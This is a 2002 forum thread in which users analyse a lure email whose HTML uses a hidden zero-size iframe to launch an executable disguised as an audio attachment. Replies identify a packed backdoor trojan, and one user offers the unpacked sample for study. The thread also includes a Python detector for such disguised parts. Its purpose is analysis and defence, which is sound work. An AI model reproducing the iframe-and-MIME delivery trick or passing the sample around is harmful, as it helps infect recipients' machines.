Armenian Knowledge Base  

22.04.2002, 16:55   #1
dolphin
*** WARNING! ***

Received: from ( [])
	by (8.11.1/8.11.1) with ESMTP id g3LKnF925868
	for <[email protected]>; Mon, 22 Apr 2002 01:49:16 +0500 (GMT)
Received: from  ( []) by
 (Rockliffe SMTPRA 4.5.6) with SMTP id <[email protected]> for <[email protected]>;
 Mon, 22 Apr 2002 01:14:09 +0500
Date: Mon, 22 Apr 2002 01:14:09 +0500
Message-ID: <[email protected]>
From: Web<[email protected]>
To: [email protected]
Subject: nor haykakan projekt
Mime-Version: 1.0
Content-Type: text/html;
X-UIDL: d\p"!Hm%"!mG,!!7GC"!
Status: R 
X-Status: N
At … a new site has opened concerning Armenia's accession to the Council of Europe. Everyone go in and vote in favour of Armenia.
<IFRAME height=0 src="; 
width=0></IFRAME> contains the following: (Attention! If you are running Windows and MS IE/Outlook, DO NOT try to download and open this file!)

From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

Content-Type: multipart/alternative; 

Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable 

<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>



Content-Type: audio/x-wav;
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

Then follows a base64-encoded hh.exe file, which probably will be automatically executed by some new versions of MS IE and Outlook...

I'm sure that it is infected with some trojan program and may be dangerous.

Here is the extracted hh.exe:

If you have some recently updated antivirus program (AVP recommended), please download this file with care (!!only download, do not open!!)
and check it. Please write the results down here.

(I'm running Linux and can't do it myself.)

Thanks in advance!

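The layout quoted in the post (an HTML part whose zero-size iframe points at a cid: part that is declared as audio/x-wav but actually carries an executable) can be checked mechanically on the mail gateway or in a triage script. The following is an added example, not code from the thread, using Python's standard-library email parser over a constructed message that mimics that layout; the fake "audio" payload is only a 40-byte stub beginning with the DOS/PE "MZ" magic, not a real binary.

```python
import email
import re
from email import policy

# Constructed sample mimicking the layout quoted in the post (not the real
# mail): the "audio/x-wav" part decodes to a 40-byte stub starting with "MZ".
SAMPLE = b"""\
From: "xxxxx" <sender@example.invalid>
MIME-Version: 1.0
Content-Type: multipart/related; boundary="B1"

--B1
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
--B1
Content-Type: audio/x-wav; name="hh.wav"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA==
--B1--
"""

# Any <iframe src="cid:..."> reference inside an HTML part, hidden or not.
IFRAME_CID = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^"\'\s>]+)', re.I)


def find_disguised_executables(raw):
    """Return [(content_id, declared_type)] for every part referenced by an
    iframe via cid: whose decoded body carries the "MZ" executable magic."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    referenced, by_cid = set(), {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            # get_content() undoes the quoted-printable encoding for us
            referenced.update(IFRAME_CID.findall(part.get_content()))
        cid = str(part.get("Content-ID", "")).strip().strip("<>")
        if cid:
            by_cid[cid] = part
    hits = []
    for cid in sorted(referenced & by_cid.keys()):
        body = by_cid[cid].get_payload(decode=True) or b""  # base64 undone
        if body.startswith(b"MZ"):
            hits.append((cid, by_cid[cid].get_content_type()))
    return hits
```

The check keys on the decoded bytes rather than the declared Content-Type, which is exactly the field the mail in the post lies about.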
22.04.2002, 17:25   #2
z0mbie

AVP & DrWeb (both updated today) find nothing, but it is definitely a trojan packed with ASPack.

As for "automatically executed": that only works on rare old versions of Outlook.
22.04.2002, 19:45   #3
VX

Yes, that's a fairly old trick, downloading a file through an iframe.
Remember, dolphin, how much water has flowed by since then.
24.04.2002, 00:46   #4
Vazgen Abgaryan

This file contains the new backdoor utility: DTR.14.c
The detection routine will be added with a daily update.

Best regards,
Valentin Kolesnikov,
Kaspersky Labs
24.04.2002, 02:50   #5

I got interested in this progie, and I unpacked it (string references only, no import table (need to run it to dump the IT, hehe)) to understand its work better. I uploaded it to my ftp and you can study its work too.
Disassemble it with your favourite disassembler and a lot of things will become understandable....
Yeah, and don't execute it, hehe ::}